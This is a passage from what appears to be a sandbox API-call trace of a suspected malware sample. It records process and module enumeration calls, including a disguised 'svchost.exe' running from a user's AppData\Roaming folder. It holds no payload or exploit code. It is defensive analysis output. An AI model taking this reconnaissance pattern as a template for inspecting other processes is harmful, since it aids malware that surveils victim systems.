lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WTSAPI32.dll") returned 0xc [0075.148] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefbb00000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WTSAPI32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")) returned 0x20 [0075.152] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd720000, lpmodinfo=0x2538398, cb=0x18 | out: lpmodinfo=0x2538398*(lpBaseOfDll=0x7fefd720000, SizeOfImage=0x3d000, EntryPoint=0x7fefd7218f4)) returned 1 [0075.155] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd720000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WINSTA.dll") returned 0xa [0075.158] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd720000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINSTA.dll" (normalized: "c:\\windows\\system32\\winsta.dll")) returned 0x1e [0075.162] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff2d0000, lpmodinfo=0x253a558, cb=0x18 | out: lpmodinfo=0x253a558*(lpBaseOfDll=0x7feff2d0000, SizeOfImage=0x71000, EntryPoint=0x7feff2e1e20)) returned 1 [0075.165] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff2d0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0075.169] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff2d0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SHLWAPI.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0075.172] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9530000, lpmodinfo=0x253c718, cb=0x18 | out: lpmodinfo=0x253c718*(lpBaseOfDll=0x7fef9530000, SizeOfImage=0x8000, EntryPoint=0x7fef9531414)) returned 1 [0075.176] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9530000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="rasadhlp.dll") returned 0xc [0075.179] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9530000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")) returned 0x20 [0075.183] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef4e80000, lpmodinfo=0x253ed00, cb=0x18 | out: lpmodinfo=0x253ed00*(lpBaseOfDll=0x7fef4e80000, SizeOfImage=0x27a000, EntryPoint=0x7fef4eb2200)) returned 1 [0075.187] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef4e80000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ESENT.dll") returned 0x9 [0075.190] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef4e80000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ESENT.dll" (normalized: "c:\\windows\\system32\\esent.dll")) returned 0x1d [0075.194] GetModuleInformation (in: hProcess=0x214, hModule=0x779f0000, lpmodinfo=0x2540ec0, cb=0x18 | out: lpmodinfo=0x2540ec0*(lpBaseOfDll=0x779f0000, SizeOfImage=0x7000, EntryPoint=0x779f106c)) returned 1 [0075.211] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x779f0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="psapi.dll") returned 0x9 [0075.215] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x779f0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll")) returned 0x1d [0075.219] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef3730000, lpmodinfo=0x2543098, cb=0x18 | out: lpmodinfo=0x2543098*(lpBaseOfDll=0x7fef3730000, SizeOfImage=0x30000, EntryPoint=0x7fef373c1fc)) returned 1 [0075.223] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef3730000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="dnsrslvr.dll") returned 0xc [0075.226] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef3730000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\dnsrslvr.dll" (normalized: "c:\\windows\\system32\\dnsrslvr.dll")) returned 0x20 [0075.230] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefacd0000, lpmodinfo=0x2545268, cb=0x18 | out: lpmodinfo=0x2545268*(lpBaseOfDll=0x7fefacd0000, SizeOfImage=0x7000, EntryPoint=0x7fefacd15d8)) returned 1 [0075.234] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefacd0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="dnsext.dll") returned 0xa [0075.238] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefacd0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\dnsext.dll" (normalized: "c:\\windows\\system32\\dnsext.dll")) returned 0x1e [0075.242] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcb20000, lpmodinfo=0x2547428, cb=0x18 | out: lpmodinfo=0x2547428*(lpBaseOfDll=0x7fefcb20000, SizeOfImage=0x1e000, EntryPoint=0x7fefcb213b8)) returned 1 [0075.246] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcb20000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="USERENV.dll") returned 0xb [0075.250] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcb20000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USERENV.dll" (normalized: "c:\\windows\\system32\\userenv.dll")) returned 0x1f [0075.254] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd780000, lpmodinfo=0x25495e8, cb=0x18 | out: lpmodinfo=0x25495e8*(lpBaseOfDll=0x7fefd780000, SizeOfImage=0xf000, EntryPoint=0x7fefd7819b0)) returned 1 [0075.258] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd780000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="profapi.dll") returned 0xb [0075.262] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd780000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")) returned 0x1f [0075.266] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xed8) returned 0x214 [0075.266] EnumProcessModules (in: hProcess=0x214, lphModule=0x254d368, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x254d368, lpcbNeeded=0x23ee40) returned 1 [0075.267] GetModuleInformation (in: hProcess=0x214, hModule=0xe70000, lpmodinfo=0x254d5d8, cb=0x18 | out: lpmodinfo=0x254d5d8*(lpBaseOfDll=0xe70000, SizeOfImage=0x116000, EntryPoint=0xf8200a)) returned 1 [0075.267] GetModuleBaseNameW (in: hProcess=0x214, hModule=0xe70000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="svchost.exe") returned 0xb [0075.267] GetModuleFileNameExW (in: hProcess=0x214, hModule=0xe70000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\svchost.exe")) returned 0x2e [0075.267] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x254f7f0, cb=0x18 | out: lpmodinfo=0x254f7f0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0075.267] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0075.267] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0075.268] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef7570000, lpmodinfo=0x25519b0, cb=0x18 | out: lpmodinfo=0x25519b0*(lpBaseOfDll=0x7fef7570000, SizeOfImage=0x6f000, EntryPoint=0x7fef7571134)) returned 1 [0075.268] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef7570000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="MSCOREE.DLL") returned 0xb [0075.268] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef7570000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSCOREE.DLL" (normalized: "c:\\windows\\system32\\mscoree.dll")) returned 0x1f [0075.268] GetModuleInformation (in: hProcess=0x214, hModule=0x77710000, lpmodinfo=0x2553b70, cb=0x18 | out: lpmodinfo=0x2553b70*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0075.268] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77710000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="KERNEL32.dll") returned 0xc [0075.269] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77710000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNEL32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0075.269] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd910000, lpmodinfo=0x2555d40, cb=0x18 | out: lpmodinfo=0x2555d40*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0075.269] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd910000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0075.269] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd910000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0075.269] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff430000, lpmodinfo=0x2557f68, cb=0x18 | out: lpmodinfo=0x2557f68*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0075.270] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff430000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0075.270] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff430000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0075.270] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff100000, lpmodinfo=0x255a138, cb=0x18 | out: lpmodinfo=0x255a138*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0075.270] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff100000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0075.271] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff100000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0075.271] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefee80000, lpmodinfo=0x255c2f8, cb=0x18 | out: lpmodinfo=0x255c2f8*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0075.271] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefee80000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0075.271] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefee80000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0075.272] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefdb50000, lpmodinfo=0x255e4b8, cb=0x18 | out: lpmodinfo=0x255e4b8*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0075.272] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefdb50000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0075.272] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefdb50000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0075.273] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef4a10000, lpmodinfo=0x2560710, cb=0x18 | out: lpmodinfo=0x2560710*(lpBaseOfDll=0x7fef4a10000, SizeOfImage=0xa9000, EntryPoint=0x7fef4a11010)) returned 1 [0075.273] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef4a10000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="mscoreei.dll") returned 0xc [0075.273] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef4a10000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll")) returned 0x3c [0075.274] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9210000, lpmodinfo=0x2562918, cb=0x18 | out: lpmodinfo=0x2562918*(lpBaseOfDll=0x7fef9210000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0075.274] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9210000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="api-ms-win-core-synch-l1-2-0.DLL") returned 0x20 [0075.274] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9210000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll")) returned 0x34 [0075.275] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff2d0000, lpmodinfo=0x2564b38, cb=0x18 | out: lpmodinfo=0x2564b38*(lpBaseOfDll=0x7feff2d0000, SizeOfImage=0x71000, EntryPoint=0x7feff2e1e20)) returned 1 [0075.275] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff2d0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0075.275] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff2d0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SHLWAPI.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0075.276] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff1c0000, lpmodinfo=0x2566cf8, cb=0x18 | out: lpmodinfo=0x2566cf8*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0075.276] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff1c0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0075.276] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff1c0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0075.277] GetModuleInformation (in: hProcess=0x214, hModule=0x77610000, lpmodinfo=0x2568eb8, cb=0x18 | out: lpmodinfo=0x2568eb8*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0075.277] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77610000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0075.278] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77610000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0075.278] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff350000, lpmodinfo=0x256b090, cb=0x18 | out: lpmodinfo=0x256b090*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0075.278] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff350000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0075.279] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff350000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0075.279] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff690000, lpmodinfo=0x256d240, cb=0x18 | out: lpmodinfo=0x256d240*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0075.280] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff690000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0075.280] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff690000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0075.281] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff400000, lpmodinfo=0x256f400, cb=0x18 | out: lpmodinfo=0x256f400*(lpBaseOfDll=0x7feff400000, SizeOfImage=0x2e000, EntryPoint=0x7feff401010)) returned 1 [0075.281] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff400000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0075.281] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff400000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IMM32.DLL" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0075.282] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff9d0000, lpmodinfo=0x25716d8, cb=0x18 | out: lpmodinfo=0x25716d8*(lpBaseOfDll=0x7feff9d0000, SizeOfImage=0x109000, EntryPoint=0x7feff9d1064)) returned 1 [0075.282] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff9d0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="MSCTF.dll") returned 0x9 [0075.283] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff9d0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSCTF.dll" (normalized: "c:\\windows\\system32\\msctf.dll")) returned 0x1d [0075.283] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefc940000, lpmodinfo=0x2573898, cb=0x18 | out: lpmodinfo=0x2573898*(lpBaseOfDll=0x7fefc940000, SizeOfImage=0xc000, EntryPoint=0x7fefc941064)) returned 1 [0075.284] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefc940000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0075.284] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefc940000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\VERSION.dll" (normalized: "c:\\windows\\system32\\version.dll")) returned 0x1f [0075.285] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef1bd0000, lpmodinfo=0x2575a58, cb=0x18 | out: lpmodinfo=0x2575a58*(lpBaseOfDll=0x7fef1bd0000, SizeOfImage=0xac7000, EntryPoint=0x7fef1bd63a0)) returned 1 [0075.285] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef1bd0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="clr.dll") returned 0x7 [0075.286] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef1bd0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clr.dll")) returned 0x37 [0075.286] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef6d20000, lpmodinfo=0x2577c40, cb=0x18 | out: lpmodinfo=0x2577c40*(lpBaseOfDll=0x7fef6d20000, SizeOfImage=0x16000, EntryPoint=0x7fef6d2c000)) returned 1 [0075.287] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef6d20000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="VCRUNTIME140_CLR0400.dll") returned 0x18 [0075.287] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef6d20000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\VCRUNTIME140_CLR0400.dll" (normalized: "c:\\windows\\system32\\vcruntime140_clr0400.dll")) returned 0x2c [0075.288] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef4950000, lpmodinfo=0x2579e40, cb=0x18 | out: lpmodinfo=0x2579e40*(lpBaseOfDll=0x7fef4950000, SizeOfImage=0xbd000, EntryPoint=0x7fef49d7db0)) returned 1 [0075.293] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef4950000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ucrtbase_clr0400.dll") returned 0x14 [0075.294] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef4950000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ucrtbase_clr0400.dll" (normalized: "c:\\windows\\system32\\ucrtbase_clr0400.dll")) returned 0x28 [0075.294] GetModuleInformation (in: hProcess=0x214, hModule=0x7feeefd0000, lpmodinfo=0x257c030, cb=0x18 | out: lpmodinfo=0x257c030*(lpBaseOfDll=0x7feeefd0000, SizeOfImage=0x15fd000, EntryPoint=0x0)) returned 1 [0075.295] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feeefd0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="mscorlib.ni.dll") returned 0xf [0075.295] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feeefd0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\mscorlib\\fe2524177eb3088c77be666722039f52\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\mscorlib\\fe2524177eb3088c77be666722039f52\\mscorlib.ni.dll")) returned 0x68 [0075.296] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff760000, lpmodinfo=0x257e290, cb=0x18 | out: lpmodinfo=0x257e290*(lpBaseOfDll=0x7feff760000, SizeOfImage=0x203000, EntryPoint=0x7feff783330)) returned 1 [0075.296] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff760000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0075.297] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff760000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0075.297] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd670000, lpmodinfo=0x2580450, cb=0x18 | out: lpmodinfo=0x2580450*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0075.298] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd670000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0075.299] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd670000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0075.299] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef75f0000, lpmodinfo=0x2582620, cb=0x18 | out: lpmodinfo=0x2582620*(lpBaseOfDll=0x7fef75f0000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0075.300] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef75f0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="api-ms-win-core-xstate-l2-1-0.dll") returned 0x21 [0075.301] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef75f0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-xstate-l2-1-0.dll")) returned 0x35 [0075.301] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef46b0000, lpmodinfo=0x2584840, cb=0x18 | out: lpmodinfo=0x2584840*(lpBaseOfDll=0x7fef46b0000, SizeOfImage=0x14f000, EntryPoint=0x7fef46b1090)) returned 1 [0075.302] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef46b0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="clrjit.dll") returned 0xa [0075.302] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef46b0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clrjit.dll")) returned 0x3a [0075.303] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef0f60000, lpmodinfo=0x2586a38, cb=0x18 | out: lpmodinfo=0x2586a38*(lpBaseOfDll=0x7fef0f60000, SizeOfImage=0xc6f000, EntryPoint=0x0)) returned 1 [0075.304] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef0f60000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="System.ni.dll") returned 0xd [0075.304] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef0f60000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\e43dd9c73ab5615e461bf5109c3facd6\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system\\e43dd9c73ab5615e461bf5109c3facd6\\system.ni.dll")) returned 0x64 [0075.305] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd640000, lpmodinfo=0x2588c90, cb=0x18 | out: lpmodinfo=0x2588c90*(lpBaseOfDll=0x7fefd640000, SizeOfImage=0x25000, EntryPoint=0x7fefd649658)) returned 1 [0075.306] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd640000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0075.306] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd640000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SspiCli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")) returned 0x1f [0075.307] GetModuleInformation (in: hProcess=0x214, hModule=0x779f0000, lpmodinfo=0x258ae50, cb=0x18 | out: lpmodinfo=0x258ae50*(lpBaseOfDll=0x779f0000, SizeOfImage=0x7000, EntryPoint=0x779f106c)) returned 1 [0075.308] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x779f0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="psapi.dll") returned 0x9 [0075.308] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x779f0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll")) returned 0x1d [0075.310] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xe10) returned 0x0 [0075.311] EnumProcesses (in: lpidProcess=0x258ddb8, cb=0x400, lpcbNeeded=0x23ed28 | out: lpidProcess=0x258ddb8, lpcbNeeded=0x23ed28) returned 1 [0075.315] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x23e980, nSize=0x101, Arguments=0x0 | out: lpBuffer="Access is denied.\r\n") returned 0x13 [0075.324] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa34) returned 0x218 [0075.324] EnumProcessModules (in: hProcess=0x218, lphModule=0x258eaf0, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x258eaf0, lpcbNeeded=0x23ee40) returned 1 [0075.325] GetModuleInformation (in: hProcess=0x218, hModule=0x13b0000, lpmodinfo=0x258ed60, cb=0x18 | out: lpmodinfo=0x258ed60*(lpBaseOfDll=0x13b0000, SizeOfImage=0x17000, 